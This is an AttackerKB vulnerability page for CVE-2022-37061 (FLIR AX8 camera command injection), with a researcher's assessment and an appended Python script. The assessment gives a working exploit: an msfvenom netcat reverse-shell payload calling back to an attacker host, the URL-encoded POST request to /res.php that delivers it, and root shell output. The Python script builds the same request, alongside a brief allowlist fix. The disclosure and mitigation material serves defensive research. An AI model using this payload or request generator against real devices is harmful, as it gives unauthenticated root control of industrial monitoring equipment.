AttackerKB AKB:D89B0899-566E-45E9-B853-6845E492A9C2
CVE-2022-37061
Aug 18, 2022
attackerkb.com
Tags: flir ax8, remote command injection, vulnerability, arbitrary commands, root privileges, lan configuration, unauthenticated, http, post parameter, res.php endpoint, industrial environments, metasploit, cve-2022-37061, cve-2022-37060, cve-2022-37062, cve-2022-37063

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 8.2
Confidence: High
EPSS: 0.975
Percentile: 100.0%

All FLIR AX8 thermal sensor cameras up to and including version 1.46.16 are vulnerable to remote command injection. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter of the res.php endpoint. A successful exploit allows the attacker to execute arbitrary commands on the underlying operating system with root privileges.

Recent assessments:

h00die-gr3y at October 20, 2022 7:41pm UTC reported:

FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras, that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.
This device is typically used for monitoring industrial environments in a LAN-based configuration. Occasionally you can find a FLIR AX8 device where the HTTP web interface is exposed to the public internet.

FLIR AX8 is affected by an unauthenticated remote command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter in the res.php endpoint. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges. This issue affects all FLIR AX8 thermal sensor cameras up to and including version 1.46.16.

The endpoint /res.php can be called remotely without user authentication, as there is no cookie verification (Cookie: PHPSESSID=ID) to check whether the request is legitimate. The second problem is that the POST parameter id can be injected to execute any Unix command, as demonstrated in the example below.

Create a netcat reverse shell payload with msfvenom:

# msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.100.7 LPORT=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 100 bytes
mkfifo /tmp/ibcnr; nc 192.168.100.7 4444 0</tmp/ibcnr | /bin/sh >/tmp/ibcnr 2>&1; rm /tmp/ibcnr

Use this payload in a Burp POST request via the vulnerable id parameter to launch a netcat shell.
Note: do not forget to apply URL encoding.

POST /res.php HTTP/1.1
Host: 192.168.100.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 174

action=alarm&id=2;mkfifo%20%2ftmp%2fibcnr%3b%20nc%20192.168.100.7%204444%200%3c%2ftmp%2fibcnr%20%7c%20%2fbin%2fsh%20%3e%2ftmp%2fibcnr%202%3e%261%3b%20rm%20%2ftmp%2fibcnr

Click Send and you will receive a netcat shell on the attacker host:

# nc -lnvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 51556
whoami
root
uname -a
Linux neco 3.0.35-flir #1 PREEMPT Thu Oct 20 08:20:20 CET 2022 armv7l GNU/Linux

The root cause of this command injection vulnerability is the lack of sanitization checks on the variable $_POST["id"] (line 65 in the file /FLIR/usr/www/res.php); malicious actors can therefore take advantage of the shell_exec() function to execute unexpected arbitrary shell commands.

Besides this vulnerability, three other vulnerabilities were identified. Check the respective CVEs for more info.

  • [CVE-2022-37060] – Unauthenticated Directory Traversal

  • [CVE-2022-37062] – Improper Access Control

  • [CVE-2022-37063] – Reflected cross-site scripting

As stated at the beginning of this analysis, it is very unlikely to find this type of device exposed to the Internet, but you will find them quite often in industrial environments deployed in a LAN-based configuration.

I have created a Metasploit module, exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061, that checks whether the device is vulnerable and launches a reverse netcat shell or Meterpreter session on a vulnerable device. You can download this module from the link in the reference section below and follow the instructions to run it locally.

Pushing this module to the Metasploit mainstream is in progress.

Mitigation

Upgrade the camera to a firmware version higher than 1.46.16.

References

Packet Storm
Metasploit development (h00die-gr3y)

Credits

Credit goes to the security researchers below who discovered these vulnerabilities.

Assessed Attacker Value: 5
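The request in the assessment above can be reconstructed, and the reason for the "do not forget the URL encoding" note made visible, with a few lines of Python. This is an added example, not code from the assessment or from the Metasploit module: the target host, LHOST, LPORT and the fifo name are copied from the assessment, the function names and the digits-only allowlist in is_safe_id() are constructed assumptions (the page does not say what a valid id looks like), and nothing is sent over the network.

```python
"""Reconstruct the CVE-2022-37061 request from the assessment above and show
what the target's PHP side makes of it. Added example; not code from the
assessment or from the Metasploit module. Host, LHOST, LPORT and the fifo name
are copied from the assessment; function names and the digits-only allowlist
are constructed assumptions. Nothing is sent over the network."""
from urllib.parse import quote, unquote_plus
import re


def reverse_shell_cmd(lhost: str, lport: int, fifo: str = "/tmp/ibcnr") -> str:
    """The same mkfifo/nc reverse shell msfvenom cmd/unix/reverse_netcat emits."""
    return (f"mkfifo {fifo}; nc {lhost} {lport} 0<{fifo} | /bin/sh >{fifo} 2>&1; "
            f"rm {fifo}")


def form_body(cmd: str, legit_id: str = "2") -> str:
    """Append cmd to a plausible id value. quote(safe='') percent-encodes space,
    '/', ';', '<', '>', '|' and, crucially, the '&' in '2>&1', so the whole
    command reaches $_POST['id'] as one field."""
    return f"action=alarm&id={legit_id};" + quote(cmd, safe="")


def raw_request(host: str, body: str) -> bytes:
    """Raw HTTP/1.1 request as it would be pasted into Burp, with the
    Content-Length computed from the encoded body instead of typed by hand."""
    data = body.encode()
    head = (f"POST /res.php HTTP/1.1\r\nHost: {host}\r\n"
            "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n"
            f"Content-Length: {len(data)}\r\n\r\n")
    return head.encode() + data


def server_side_id(body: str) -> str:
    """Decode the body the way PHP fills $_POST: split fields on '&', split each
    on the first '=', then percent-decode. The result is the unchecked string
    res.php concatenates into its shell_exec() call."""
    for field in body.split("&"):
        name, _, value = field.partition("=")
        if name == "id":
            return unquote_plus(value)
    return ""


ID_OK = re.compile(r"[0-9]{1,6}")  # constructed allowlist; real id format unknown


def is_safe_id(value: str) -> bool:
    """Allowlist check a fixed res.php would apply before any shell call:
    only a short run of digits is accepted, so metacharacters never reach sh."""
    return ID_OK.fullmatch(value) is not None


if __name__ == "__main__":
    cmd = reverse_shell_cmd("192.168.100.7", 4444)
    body = form_body(cmd)
    print(raw_request("192.168.100.2", body).decode())
    print("PHP side sees id =", server_side_id(body))
    # Without encoding, PHP splits the body at the '&' of '2>&1' and the
    # injected command is cut off at '2>'.
    print("unencoded id     =", server_side_id(f"action=alarm&id=2;{cmd}"))
    print("allowlist blocks it:", not is_safe_id(server_side_id(body)))
```

Run stand-alone it prints the request, the decoded id value the camera's PHP would pass to shell_exec(), and the truncated value you get when the command is pasted unencoded: the form parser splits at the `&` inside `2>&1`, so sh receives a command ending in `2>` and a stray field named `1; rm /tmp/ibcnr`, which is why the encoding step in the assessment is not optional. The is_safe_id() allowlist, together with an actual session check before the endpoint does any work, is the server-side shape of the fix the root-cause paragraph points at.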
